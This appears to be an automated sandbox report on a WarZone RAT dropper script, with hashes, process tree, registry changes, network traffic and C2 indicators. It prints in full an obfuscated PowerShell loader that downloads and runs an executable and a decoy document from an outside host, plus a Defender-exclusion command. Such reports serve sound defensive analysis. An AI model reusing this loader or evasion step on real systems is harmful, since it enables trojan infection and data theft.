File name: | payload.vbs |
Full analysis: | https://app.any.run/tasks/68c5297b-cad9-480a-9979-52ad78b3cbaa |
Verdict: | Malicious activity |
Threats: | WarZone RAT is a remote access trojan, which is written in C++ and offered as a malware-as-a-service. It packs a wide range of capabilities, from stealing victims’ files and passwords to capturing desktop activities. WarZone RAT is primarily distributed via phishing emails and receives regular updates from its C2. |
Analysis date: | September 30, 2023, 18:10:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines |
MD5: | EBD8D4466968F9459C1E6CE8D3089371 |
SHA1: | 87CA4C6C2A9F60C3E732345F64A2193726FBBAC0 |
SHA256: | 9EDCA23169D5993D4741088D4615576995EDCB96B6EC2614ADA0FEB8792E3D75 |
SSDEEP: | 1536:WdxPs2Sg7fWmSVpYXclxFkonXBLbicyjTj45:72SSWj5VcjTj45 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3296 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\payload.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
3080 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QCyOP($LfxxvIXuk, $nsNHppl){[IO.File]::WriteAllBytes($LfxxvIXuk, $nsNHppl)};function UTgnMckai($LfxxvIXuk){if($LfxxvIXuk.EndsWith((PzWDEgSp @(42681,42735,42743,42743))) -eq $True){Start-Process (PzWDEgSp @(42749,42752,42745,42735,42743,42743,42686,42685,42681,42736,42755,42736)) $LfxxvIXuk}else{Start-Process $LfxxvIXuk}};function oWcFuS($QAGuEuW){$GEWkFQ = New-Object (PzWDEgSp @(42713,42736,42751,42681,42722,42736,42733,42702,42743,42740,42736,42745,42751));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$nsNHppl = $GEWkFQ.DownloadData($QAGuEuW);return $nsNHppl};function PzWDEgSp($DwsEszM){$xAvBHV=42635;$YxQnI=$Null;foreach($GJWJwE in $DwsEszM){$YxQnI+=[char]($GJWJwE-$xAvBHV)};return $YxQnI};function fMxFFYYf(){$fFIONeQho = $env:APPDATA + '\';$KpdLa = oWcFuS (PzWDEgSp @(42739,42751,42751,42747,42750,42693,42682,42682,42754,42754,42754,42681,42737,42749,42736,42736,42734,42749,42756,42747,42751,42746,42749,42746,42733,42746,42751,42681,42734,42746,42744,42682,42717,42736,42743,42736,42732,42750,42736,42682,42690,42688,42710,42730,42704,42712,42700,42708,42711,42730,42720,42718,42704,42717,42715,42700,42718,42718,42681,42749,42751,42737));$ZgzkEmW = $fFIONeQho + '75K_EMAIL_USERPASS.rtf';QCyOP $ZgzkEmW $KpdLa;UTgnMckai $ZgzkEmW;;$TobweY = oWcFuS (PzWDEgSp @(42739,42751,42751,42747,42750,42693,42682,42682,42754,42754,42754,42681,42737,42749,42736,42736,42734,42749,42756,42747,42751,42746,42749,42746,42733,42746,42751,42681,42734,42746,42744,42682,42717,42736,42743,42736,42732,42750,42736,42682,42702,42732,42734,42739,42736,42681,42736,42755,42736));$pXbEDyNl = $fFIONeQho + 'Cache.exe';QCyOP $pXbEDyNl $TobweY;UTgnMckai $pXbEDyNl;;;}fMxFFYYf; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
308 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Roaming\75K_EMAIL_USERPASS.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.5123.5000 Modules
| |||||||||||||||
3380 | "C:\Users\admin\AppData\Roaming\Cache.exe" | C:\Users\admin\AppData\Roaming\Cache.exe | — | powershell.exe | |||||||||||
User: admin Company: EVAwoHec Integrity Level: MEDIUM Description: ORaJI uuEx UmOIaKeFuYa EeIhI eQIcOgOTo. Exit code: 0 Version: 7.50.939.23 Modules
| |||||||||||||||
2680 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\tmp70BC.tmp.bat"" | C:\Windows\SysWOW64\cmd.exe | — | Cache.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
788 | timeout 3 | C:\Windows\SysWOW64\timeout.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1896 | "C:\Users\admin\AppData\Roaming\svchost.exe" | C:\Users\admin\AppData\Roaming\svchost.exe | — | cmd.exe | |||||||||||
User: admin Company: EVAwoHec Integrity Level: MEDIUM Description: ORaJI uuEx UmOIaKeFuYa EeIhI eQIcOgOTo. Exit code: 0 Version: 7.50.939.23 Modules
| |||||||||||||||
3176 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\admin\AppData\Roaming\svchost.exe" -Force | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2884 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: .NET Runtime Optimization Service Version: 4.7.2558.0 built by: NET471REL1 Modules
WarZone(PID) Process(2884) mscorsvw.exe C2 (2)Superherocan.mywire.org:5200 SuperGuy.camdvr.org:6000 BuildID2ATGDKGAR24 Options Install FlagFalse Startup FlagFalse Reverse Proxy local port5000 Offline logTrue PersistanceFalse UAC bypassFalse Defender bypassFalse Use ADSFalse |
(PID) Process: | (3296) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3296) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3296) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3296) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3080) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\156\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (3080) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates\C7C20953EB5AC83C81CA388170EEC982E577F810 |
Operation: | write | Name: | Blob |
Value: 0200000001000000CC0000001C0000006C00000001000000000000000000000000000000010000007B00340030004100350046004200430032002D0038004600300046002D0034003700320044002D0039004200380041002D003700420032003500300034004300300045004200410038007D00000000004D006900630072006F0073006F0066007400200045006E00680061006E006300650064002000430072007900700074006F0067007200610070006800690063002000500072006F00760069006400650072002000760031002E003000000000001900000001000000100000000FED148DCA9288CFE9E8CFEDE332D41E0F00000001000000200000003940FA3A00F54D92B7F88E2D48C2772C8ABB2A13E49A0D26CD13424C4B551832030000000100000014000000C7C20953EB5AC83C81CA388170EEC982E577F810140000000100000014000000396A962A0D9CA2D65CF53FD9D5915A728280AB8020000000010000004C0300003082034830820230A0030201020209009BC2D79761F68C84300D06092A864886F70D01010B05003039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E79301E170D3230303932383036333030355A170D3330303932363036333030355A3039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E7930820122300D06092A864886F70D01010105000382010F003082010A0282010100A20B189EC9265492B7621FFE83B82E05923AB02D2DEE3E20C24BB7D8923FA45D5D62E0925DAF5EABBDD7C870E4D1229FF08A2D78D685E81450475802410F692FBBD1DFA12CE5E60EE26583458D949D7C0EDC212A1DCADB4426B6F6C2BE40B90B95BED978CC99FCBE9C00035C8FEE07200B20EA4B86FD3E9FFE42AAD926D2D381CC4C95AF963C3A19A7C90BC1C084F7434A83B0626E41A8E4EB3AC624E5DBB3D3214D535FC45294D746609F6E69B44DA48305DE63BA6FEF283E2778254E8579ABB0295629954E228B18AB5355FEF0F664D9DCD2C4A5047D4879BE8587687E37DE690C4E0D45927B2384E1BF09BE1F2744B50D54D5CD0B1223F5D31A446401D1A90203010001A3533051301D0603551D0E04160414396A962A0D9CA2D65CF53FD9D5915A728280AB80301F0603551D23041830168014396A962A0D9CA2D65CF53FD9D5915A728280AB80300F0603551D130101FF040530030101FF300D06092A864886F70D01010B0500038201010089391C5F3A6B3AA5CCD58C62CE4DC5E71A59F014066678C1ECB7959D4F5F5ACDF23E1EAD032ECC41C459B54A991C40E23F546C64C424BF954035D94C0F30EA7172E98E40F5D8A9B389A56360D837BDF5149754095403EE1AC7BE6415DEA18C10E98113868D6BD01C1FCA8A7704AAB167D9BA70D4FBCCC8E1836CC11AF03E8A62E13DB2EBF7038E469ED65D1D46B3074D92BB304F8FF41068DEC4BB499974635A8C524E4DA418B524529C641DBA82918A55FFBC82B8688B0838C3CEB24647B6142CDB17837E3978D7C551803638DE839DC9B2F9B368773E9148364ABEACF9ABB4A20A3D72122F22E3E17F0969B4C8C2CAF88C5B5D74EC82C19FA533D01ADD79A3 | |||
(PID) Process: | (3080) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates\C7C20953EB5AC83C81CA388170EEC982E577F810 |
Operation: | write | Name: | Blob |
Value: 040000000100000010000000F7998935234BC4DE2CB672C84BD55034140000000100000014000000396A962A0D9CA2D65CF53FD9D5915A728280AB80030000000100000014000000C7C20953EB5AC83C81CA388170EEC982E577F8100F00000001000000200000003940FA3A00F54D92B7F88E2D48C2772C8ABB2A13E49A0D26CD13424C4B5518321900000001000000100000000FED148DCA9288CFE9E8CFEDE332D41E0200000001000000CC0000001C0000006C00000001000000000000000000000000000000010000007B00340030004100350046004200430032002D0038004600300046002D0034003700320044002D0039004200380041002D003700420032003500300034004300300045004200410038007D00000000004D006900630072006F0073006F0066007400200045006E00680061006E006300650064002000430072007900700074006F0067007200610070006800690063002000500072006F00760069006400650072002000760031002E0030000000000020000000010000004C0300003082034830820230A0030201020209009BC2D79761F68C84300D06092A864886F70D01010B05003039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E79301E170D3230303932383036333030355A170D3330303932363036333030355A3039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E7930820122300D06092A864886F70D01010105000382010F003082010A0282010100A20B189EC9265492B7621FFE83B82E05923AB02D2DEE3E20C24BB7D8923FA45D5D62E0925DAF5EABBDD7C870E4D1229FF08A2D78D685E81450475802410F692FBBD1DFA12CE5E60EE26583458D949D7C0EDC212A1DCADB4426B6F6C2BE40B90B95BED978CC99FCBE9C00035C8FEE07200B20EA4B86FD3E9FFE42AAD926D2D381CC4C95AF963C3A19A7C90BC1C084F7434A83B0626E41A8E4EB3AC624E5DBB3D3214D535FC45294D746609F6E69B44DA48305DE63BA6FEF283E2778254E8579ABB0295629954E228B18AB5355FEF0F664D9DCD2C4A5047D4879BE8587687E37DE690C4E0D45927B2384E1BF09BE1F2744B50D54D5CD0B1223F5D31A446401D1A90203010001A3533051301D0603551D0E04160414396A962A0D9CA2D65CF53FD9D5915A728280AB80301F0603551D23041830168014396A962A0D9CA2D65CF53FD9D5915A728280AB80300F0603551D130101FF040530030101FF300D06092A864886F70D01010B0500038201010089391C5F3A6B3AA5CCD58C62CE4DC5E71A59F014066678C1ECB7959D4F5F5ACDF23E1EAD032ECC41C459B54A991C40E23F546C64C424BF954035D94C0F30EA7172E98E40F5D8A9B389A56360D837BDF5149754095403EE1AC7BE6415DEA18C10E98113868D6BD01C1FCA8A7704AAB167D9BA70D4FBCCC8E1836CC11AF03E8A62E13DB2EBF7038E469ED65D1D46B3074D92BB304F8FF41068DEC4BB499974635A8C524E4DA418B524529C641DBA82918A55FFBC82B8688B0838C3CEB24647B6142CDB17837E3978D7C551803638DE839DC9B2F9B368773E9148364ABEACF9ABB4A20A3D72122F22E3E17F0969B4C8C2CAF88C5B5D74EC82C19FA533D01ADD79A3 | |||
(PID) Process: | (308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1041 |
Value: On | |||
(PID) Process: | (308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1042 |
Value: On |
PID | Process | Filename | Type | |
---|---|---|---|---|
308 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3BE0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
308 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0000.doc | — | |
MD5:— | SHA256:— | |||
308 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0001.doc | — | |
MD5:— | SHA256:— | |||
3176 | powershell.exe | C:\Users\admin\AppData\Local\Temp\vsdf02ho.5r3.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3380 | Cache.exe | C:\Users\admin\AppData\Local\Temp\tmp70BC.tmp.bat | text | |
MD5:D76DE334DADD5F50AC32212D9C9E2EE0 | SHA256:84D3177F8CD041A09EACE21034542AE0D60F33EEEA9CC1CF9B682CD1D7B9C172 | |||
3080 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ssed25bn.rry.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3080 | powershell.exe | C:\Users\admin\AppData\Local\Temp\3mwkonp4.ubs.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3380 | Cache.exe | C:\Users\admin\AppData\Roaming\svchost.exe | executable | |
MD5:19FACA8998FC47A4ED790B4C8CBC4E6B | SHA256:86C94E5F96B047700F26F29D0F0ECF7BC76C78883C859E4D26FE4F3E3E00E7AD | |||
3080 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
3176 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jbk2bzqz.5yo.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | www.freecryptorobot.com:443 | https://www.freecryptorobot.com/Release/Cache.exe | unknown | executable | 1015 Kb | — |
— | — | GET | 200 | www.freecryptorobot.com:443 | https://www.freecryptorobot.com/Release/75K_EMAIL_USERPASS.rtf | unknown | text | 2.20 Mb | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1208 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
332 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3080 | powershell.exe | 194.87.14.76:443 | www.freecryptorobot.com | HostSlick | CZ | unknown |
2884 | mscorsvw.exe | 185.225.74.106:5200 | Superherocan.mywire.org | AS-DC | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.freecryptorobot.com |
| unknown |
Superherocan.mywire.org |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
332 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.mywire .org Domain |
2884 | mscorsvw.exe | A Network Trojan was detected | ET MALWARE Warzone RAT Response (Inbound) |